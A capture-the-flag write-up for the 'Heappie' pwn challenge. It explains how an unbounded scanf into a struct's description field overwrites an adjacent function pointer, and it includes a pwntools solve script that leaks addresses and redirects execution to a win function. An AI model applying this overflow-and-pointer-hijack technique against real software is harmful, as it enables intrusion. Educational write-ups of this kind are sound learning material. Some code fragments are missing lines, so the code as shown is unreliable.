Heappie is a simple application that allows you to save and play your favorite songs. Find a way to exploit it and read the flag.
Format : Hero{flag}
Author : xanhacks
The objective is to display the flag by calling the win
void win() {
char flag[64];
FILE* f = fopen("flag.txt", "r");
if (f == NULL) {
puts("Flag file is missing!");
fgets(flag, sizeof(flag), f);
printf("Flag: %s", flag);
To do that, we will overwrite the play
function pointer of the Music
typedef struct Music {
void (*play)(struct Music*);
char title[32];
char artist[32];
char description[128];
} Music;
Once the function pointer is overwritten, playing a song will call the win
function and display the flag.
The overflow is possible due to this scanf
call, which does not check the size of the user input:
printf("Enter music description: ");
scanf("%s", music->description);
So we will fill the 128 bytes of the description
buffer and then overwrite the play
attribute of the next Music
struct that is added. Of course, the next Music
struct should be created without a play
function to avoid overwriting our win
function pointer.
description = b"A" * 128 + p64(elf.sym["win"])
Here is my solve script:
#!/usr/bin/env python3
from pwn import ELF, remote, p64, context
elf = context.binary = ELF('heappie/heappie', checksec=False)
b"music 1": elf.sym["play_1"],
b"music 2": elf.sym["play_2"],
b"music 3": elf.sym["play_3"]
# io = process(elf.path)
io = remote("localhost", 9000)
def add_music(title, artist, description, add_music):
io.sendlineafter(b'>> ', b'1')
io.sendlineafter(b'music? (y/n): ', add_music)
io.sendlineafter(b'title: ', title)
io.sendlineafter(b'artist: ', artist)
io.sendlineafter(b'description: ', description)
def play_music(idx, leak_play_symbol=False):
io.sendlineafter(b'>> ', b'2')
io.sendlineafter(b'index: ', str(idx).encode())
if leak_play_symbol:
data = io.recvline()
for key, value in PLAY_SYMBOLS.items():
if key in data:
return value
def delete_music(idx):
io.sendlineafter(b'>> ', b'3')
io.sendlineafter(b'index: ', str(idx).encode())
def show_playlist(leak_play_address=False):
io.sendlineafter(b'>> ', b'4')
if leak_play_address:
io.recvuntil(b"(song: ")
return int(io.recvline().strip()[:-1], 16)
# ----[ EXPLOIT ]-----
# context.log_level = 'debug'
add_music(b"AAAA", b"BBBB", b"CCCC", b"y")
play_addr = show_playlist(leak_play_address=True)
play_sym = play_music(0, leak_play_symbol=True)
elf.address = play_addr - play_sym
print(f"Play address: {hex(play_addr)}")
print(f"Play symbol: {hex(play_sym)}")
print(f"ELF base address: {hex(elf.address)}")
print(f"Win function address: {hex(elf.sym['win'])}")
input("Press Enter to continue...")
description = b"O" * 128 + p64(elf.sym["win"])
add_music(b"MMMM", b"NNNN", description, b"n")
add_music(b"XXXX", b"YYYY", b"ZZZZ", b"n")
Execution of the script:
$ python3
[+] Opening connection to localhost on port 9000: Done
Play address: 0x5e22729a12b3
Play symbol: 0x12b3
ELF base address: 0x5e22729a0000
Win function address: 0x5e22729a11f9
Press Enter to continue...
b'Flag: Hero{F4K3_FL4G}\n'
[*] Closed connection to localhost port 9000